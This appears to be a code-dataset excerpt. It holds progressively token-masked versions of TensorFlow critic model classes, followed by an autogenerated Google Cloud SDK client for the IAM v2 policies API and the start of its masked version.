SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n <function token>\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n\n\nclass BilinearCritic(tf.keras.Model):\n <function token>\n <function token>\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass ConcatCritic(tf.keras.Model):\n <function token>\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass ConcatCritic(tf.keras.Model):\n <function token>\n <function token>\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SeparableCritic(tf.keras.Model):\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,824 | 803429f65cdfbd975c4370498d8c4c799ee84bbc | """Generated client library for iam version v2."""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.iam.v2 import iam_v2_messages as messages
class IamV2(base_api.BaseApiClient):
"""Generated client library for service iam version v2."""
MESSAGES_MODULE = messages
BASE_URL = 'https://iam.googleapis.com/'
MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'
_PACKAGE = 'iam'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v2'
_CLIENT_ID = 'CLIENT_ID'
_CLIENT_SECRET = 'CLIENT_SECRET'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'IamV2'
_URL_VERSION = 'v2'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new iam handle."""
url = url or self.BASE_URL
super(IamV2, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.policies_operations = self.PoliciesOperationsService(self)
self.policies = self.PoliciesService(self)
class PoliciesOperationsService(base_api.BaseApiService):
"""Service class for the policies_operations resource."""
_NAME = 'policies_operations'
def __init__(self, client):
super(IamV2.PoliciesOperationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.
Args:
request: (IamPoliciesOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}',
http_method='GET',
method_id='iam.policies.operations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v2/{+name}',
request_field='',
request_type_name='IamPoliciesOperationsGetRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
class PoliciesService(base_api.BaseApiService):
"""Service class for the policies resource."""
_NAME = 'policies'
def __init__(self, client):
super(IamV2.PoliciesService, self).__init__(client)
self._upload_configs = {
}
def CreatePolicy(self, request, global_params=None):
r"""Creates a policy.
Args:
request: (IamPoliciesCreatePolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('CreatePolicy')
return self._RunMethod(
config, request, global_params=global_params)
CreatePolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}',
http_method='POST',
method_id='iam.policies.createPolicy',
ordered_params=['parent'],
path_params=['parent'],
query_params=['policyId'],
relative_path='v2/{+parent}',
request_field='googleIamV2Policy',
request_type_name='IamPoliciesCreatePolicyRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a policy. This action is permanent.
Args:
request: (IamPoliciesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',
http_method='DELETE',
method_id='iam.policies.delete',
ordered_params=['name'],
path_params=['name'],
query_params=['etag'],
relative_path='v2/{+name}',
request_field='',
request_type_name='IamPoliciesDeleteRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets a policy.
Args:
request: (IamPoliciesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleIamV2Policy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',
http_method='GET',
method_id='iam.policies.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v2/{+name}',
request_field='',
request_type_name='IamPoliciesGetRequest',
response_type_name='GoogleIamV2Policy',
supports_download=False,
)
def ListPolicies(self, request, global_params=None):
r"""Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.
Args:
request: (IamPoliciesListPoliciesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleIamV2ListPoliciesResponse) The response message.
"""
config = self.GetMethodConfig('ListPolicies')
return self._RunMethod(
config, request, global_params=global_params)
ListPolicies.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}',
http_method='GET',
method_id='iam.policies.listPolicies',
ordered_params=['parent'],
path_params=['parent'],
query_params=['pageSize', 'pageToken'],
relative_path='v2/{+parent}',
request_field='',
request_type_name='IamPoliciesListPoliciesRequest',
response_type_name='GoogleIamV2ListPoliciesResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
r"""Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.
Args:
request: (GoogleIamV2Policy) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',
http_method='PUT',
method_id='iam.policies.update',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v2/{+name}',
request_field='<request>',
request_type_name='GoogleIamV2Policy',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
| [
"\"\"\"Generated client library for iam version v2.\"\"\"\n# NOTE: This file is autogenerated and should not be edited by hand.\n\nfrom __future__ import absolute_import\n\nfrom apitools.base.py import base_api\nfrom googlecloudsdk.third_party.apis.iam.v2 import iam_v2_messages as messages\n\n\nclass IamV2(base_api.BaseApiClient):\n \"\"\"Generated client library for service iam version v2.\"\"\"\n\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None,\n get_credentials=True, http=None, model=None,\n log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(\n url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args,\n default_global_params=default_global_params,\n additional_http_headers=additional_http_headers,\n response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {\n }\n\n def Get(self, request, global_params=None):\n r\"\"\"Gets the latest state of a long-running operation. 
Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Get.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}',\n http_method='GET',\n method_id='iam.policies.operations.get',\n ordered_params=['name'],\n path_params=['name'],\n query_params=[],\n relative_path='v2/{+name}',\n request_field='',\n request_type_name='IamPoliciesOperationsGetRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {\n }\n\n def CreatePolicy(self, request, global_params=None):\n r\"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n CreatePolicy.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}',\n http_method='POST',\n method_id='iam.policies.createPolicy',\n ordered_params=['parent'],\n path_params=['parent'],\n query_params=['policyId'],\n relative_path='v2/{+parent}',\n request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n\n def Delete(self, request, global_params=None):\n r\"\"\"Deletes a policy. 
This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Delete.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE',\n method_id='iam.policies.delete',\n ordered_params=['name'],\n path_params=['name'],\n query_params=['etag'],\n relative_path='v2/{+name}',\n request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n\n def Get(self, request, global_params=None):\n r\"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Get.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET',\n method_id='iam.policies.get',\n ordered_params=['name'],\n path_params=['name'],\n query_params=[],\n relative_path='v2/{+name}',\n request_field='',\n request_type_name='IamPoliciesGetRequest',\n response_type_name='GoogleIamV2Policy',\n supports_download=False,\n )\n\n def ListPolicies(self, request, global_params=None):\n r\"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n ListPolicies.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}',\n http_method='GET',\n method_id='iam.policies.listPolicies',\n ordered_params=['parent'],\n path_params=['parent'],\n query_params=['pageSize', 'pageToken'],\n relative_path='v2/{+parent}',\n request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False,\n )\n\n def Update(self, request, global_params=None):\n r\"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. 
This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Update.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT',\n method_id='iam.policies.update',\n ordered_params=['name'],\n path_params=['name'],\n query_params=[],\n relative_path='v2/{+name}',\n request_field='<request>',\n request_type_name='GoogleIamV2Policy',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n",
"<docstring token>\nfrom __future__ import absolute_import\nfrom apitools.base.py import base_api\nfrom googlecloudsdk.third_party.apis.iam.v2 import iam_v2_messages as messages\n\n\nclass IamV2(base_api.BaseApiClient):\n \"\"\"Generated client library for service iam version v2.\"\"\"\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. 
Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. 
